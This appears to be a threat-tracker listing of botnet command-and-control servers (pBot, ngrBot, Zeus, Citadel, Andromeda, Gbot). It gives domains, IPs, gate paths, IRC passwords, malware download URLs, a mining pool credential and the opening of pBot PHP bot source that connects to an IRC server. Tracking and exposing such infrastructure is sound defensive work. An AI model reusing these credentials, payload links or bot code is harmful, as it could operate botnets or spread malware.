Resolved kiz.no-ip.biz to 94.242.238.213 Server: kiz.no-ip.biz Gate file: /xen/ride/gate.php Hosting infos: http://whois.domaintools.com/94.242.238.213
irc.by(Linux pBots hosted in Netherlands Netrc Llc)
Resolved : [irc.by] To [91.214.111.26] Here is the pBot: <!-- set_time_limit(0); error_reporting(0); class pBot { var config = array("server"=>"irc.by", "port"=>6669, "pass"=>"fx", "prefix"=>"fvox", "maxrand"=>8, "chan"=>"#webs", "key"=>"", "modes"=>"+iB-x", "password"=>"webs", "trigger"=>".", "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname ); var users = array(); function start() { if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30))) this->start(); ident = ""; alph = range("a","z"); for(i=0;i<this->config['maxrand'];i++) ident .=Read more...
othar.tk (Gbot http bot hosted by mchost.ru)
Resolved othar.tk to 178.208.80.88 Server: othar.tk Gate file: //getcmd.php Hosting infos: http://whois.domaintools.com/178.208.80.88
46.165.209.181(ngrBot hosted in Germany Frankfurt Am Main Leaseweb Germany Gmb)h
Server:46.165.209.181:1887 Server:95.211.211.69:1887 Now talking in #pool Topic On: [ #pool ] [ ~pu hxxp://www.sendspace.com/pro/dl/cbl9jc 0dd3c01bdc07bd74c7eb7d76488f7858 -r ] Topic By: [ google ] Modes On: [ #pool ] [ +smntMu ] Traffic – by DNS samples downloaded by this exe www.sendspace.com/pro/dl/cbl9jc fs01n4.sendspace.com/dlpro/c39fbffebf805aebb814397028790f8f/50f839ec/cbl9jc/apocalipss.exe www.sendspace.com/pro/dl/je1b2n fs01n4.sendspace.com/dlpro/65e23174885e70f50c60165a549e2504/50f839f1/je1b2n/afgh.exe www.sendspace.com/pro/dl/qdzubq fs01n4.sendspace.com/dlpro/69390ccaa0039b65a93bd54175c25dba/50f839f5/qdzubq/fdgd.exe www.sendspace.com/pro/dl/xvmvkvfs07n1.sendspace.com/dlpro/145b6e78853ec6d5b05678662487d679/50f974d7/xvmvkv/acuavit.exewww.sendspace.com/pro/dl/fea2gpfs07n2.sendspace.com/dlpro/3adeaf41953e34a07a8d6839d41e0ed3/50f974db/fea2gp/adgf.exewww.sendspace.com/pro/dl/qesvuufs07n5.sendspace.com/dlpro/d0e84ae45337f129391c5db17d00aa2f/50f974df/qesvuu/hkjgf.exe hosting infos: http://whois.domaintools.com/46.165.209.181
musicdisk.net(Zeus hosted in Germany Frankfurt Am Main Intergenia Ag)
Resolved : [musicdisk.net] To [85.25.2.9] Panel:http://www.musicdisk.net/zeus/ config.bin:www.musicdisk.net/zeus/cfg.bin bot.exe:hxxp://www.musicdisk.net/zeus/bot.exe hosting infos: http://whois.domaintools.com/85.25.2.9
tassweq.com(ngrBot hosted in United States West Chester Privatesystems Networks Ca)
There is no sample so i cant post channels u can see if u can find channels your self Resolved : [tassweq.com] To [67.222.19.155] Resolved : [zerx-virus.biz] To [67.222.19.155] Server: tassweq.com:7000 PASS trb123trb NICK ydgchu USER rqqlrc “” “ooq” :rqqlrc UPDATE: Server: zerx-virus.biz :4040 PASS trb123trb Server: tassweq.com :4040 PASS trb123trb 67.222.19.155:4040 Nick: n{US|XPa}radwklw Username:Read more...
animalrights.co.in (Citadel banking malware hosted by MegaHoster.Net)
Resolved animalrights.co.in to 85.25.97.204 Server: animalrights.co.in Gate file: /netwolf/wolf.php Config file: /netwolf/file.php Additional locations of interest: /backup/ /cmd/images/ /cmd/cp.php Hosting infos: http://whois.domaintools.com/85.25.97.204
vg-update.ru (Andromeda http botnet hosted by voxility.net)
Resolved vg-update.ru to 37.221.170.75 Server: vg-update.ru Gate file: /gi8i/hTcP/dy0v/header.php Hosting infos: http://whois.domaintools.com/37.221.170.75
winterprofit.com (Gbot http botnet hosted by metrabyte.co.th)
Resolved winterprofit.com to 119.59.99.200 Server: winterprofit.com Gate file: /exm/getcmd.php The idiot who owns this setup the bot so that it has http:// in the dns request. Good luck getting any bots to connect. Hosting infos: http://whois.domaintools.com/119.59.99.200
gwassnet.com (Andromeda http botnet hosted by voxility.net)
Resolved gwassnet.com to 37.221.170.240 Server: gwassnet.com Gate file: /gwas/Panel/image.php I’m going to guess this is the same guy as the other gwass domain. Also, bitcoin mining info: http://Hung:28787@pool.bitclockers.com:8332 Hosting info: http://whois.domaintools.com/37.221.170.240